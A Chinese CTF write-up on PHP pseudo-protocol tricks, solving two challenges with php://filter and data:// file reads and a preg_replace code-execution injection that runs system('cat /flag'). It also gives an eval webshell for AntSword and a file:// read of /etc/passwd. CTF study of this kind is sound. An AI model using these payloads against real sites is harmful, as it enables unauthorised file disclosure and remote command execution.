PHP伪协议

php伪协议的相关知识点：

[php知识点]PHP伪协议_Landasika的博客-CSDN博客
PHP伪协议总结 - 个人文章 - SegmentFault 思否

PHP伪协议_H0ne的博客-CSDN博客

PHP伪协议详解_Snakin_ya的博客-CSDN博客

php://filter可以获取指定文件源码。当它与包含函数结合时，php://filter流会被当作php文件执行。所以我们一般对其进行编码，让其不执行，从而导致任意文件读取

file://伪协议 （读取文件内容）

通过file协议可以访问本地文件系统，读取到文件的内容，并且不受allow_url_fopen，allow_url_include影响
file://协议主要用于访问文件(绝对路径、相对路径以及网络路径)
比如：http://www.xx.com?file=file:///etc/passsword
 

协议参数：

常用的有

php://filter/read=convert.base64-encode/resource=index.php
php://filter/resource=index.php

---

[BSidesCF 2020]Had a bad day

在注入点后加上

php://filter/resource=index.php

 存在文件包含漏洞

去掉php，因为这个源码里会自动给加一个.php

即加上

php://filter/resource=index

出现这样的结果，我们可以换个加密语句

 换为:

php://filter/read=convert.base64-encode/resource=index

 因为我们采用了base64加密，将出现的内容复制进行解密

  
    
    
    
    
    
    
    
  
  
    

      

        

          Had a bad day?
          

        

      
      

      

        

          

          

            

            
            
Cheer up!
              

                Did you have a bad day? Did things not go your way today? Are you feeling down? Pick an option and let the adorable images cheer you up!
              
              

              
			
          

              Woofers
              Meowers
          

          
        
      
    
    
  

 找到index.php

 传入的category参数必须有woofers,meowers,index才行

输入

woofers/../flag

 

后查看源代码，看见源代码里有提示flag

那如何去获取flag.php的内容呢

这里使用的知识点是php://filter伪协议套协议

输入

/index.php?category=php://filter/convert.base64-encode/index/resource=flag

得到如下页面

 复制进行解码得到flag

---

 php伪协议相关知识点

 https://www.cnblogs.com/wjrblogs/p/12285202.html

preg_replace远程代码执行

代码审计Day8 - preg_replace函数之命令执行 - 知乎

深入研究preg_replace与代码执行 - 先知社区

 老洞新姿势，记一次漏洞挖掘和利用(PHPMailer RCE) - 先知社区

https://www.cnblogs.com/dhsx/p/4991983.html

 preg_replace函数

PHP: preg_replace - Manual

---

[BJDCTF2020]ZJCTF，不过如此

查看题目为：

通过分析代码可知，GET传入两个参数text和file，test参数利用file_get_contents()参数只读形式打开，打开内容要和I have a dream 字符串内容相匹配，才能执行下面的文件包含$file参数，用file_get_contents()打开$text参数，以及下面的文件包含函数，则我们可以用php伪协议中的data://协议用filter协议去读下next.php的源码

php://filter可以获取指定文件源码。当它与包含函数结合时，php://filter流会被当作php文件执行。所以我们一般对其进行编码，让其不执行，从而导致任意文件读取

file://伪协议 （读取文件内容）

通过file协议可以访问本地文件系统，读取到文件的内容

data://（读取文件）

和php伪协议的input类似，碰到file_get_contents()来用

 输入以下代码

index.php?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php

 得到以下界面，复制去base64解码得到

 解密得到以下代码

 $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

 在代码中发现PHP preg_replace()函数

相关笔记链接：深入研究preg_replace与代码执行 - 先知社区

 PHP preg_replace() 函数

preg_replace — 执行一个正则表达式的搜索和替换

 固定解题模式:

 \S*=${}

 输入以下代码

next.php?\S*=${getFlag()}&cmd=system('cat /flag');

 直接得到flag

或者

也可以用preg_replace()函数的代码执行构造出一个一句话木马用蚁剑连接找flag

\next.php?\S*=${eval($_[POST[cmd])};

在根目录下找到flag

参考wp有

[BJDCTF2020]ZJCTF，不过如此_penson by 小乌的博客-CSDN博客

[BJDCTF2020]ZJCTF，不过如此1_十九不瞌睡的博客-CSDN博客

BUUCTF [BJDCTF2020]ZJCTF，不过如此_suppose18的博客-CSDN博客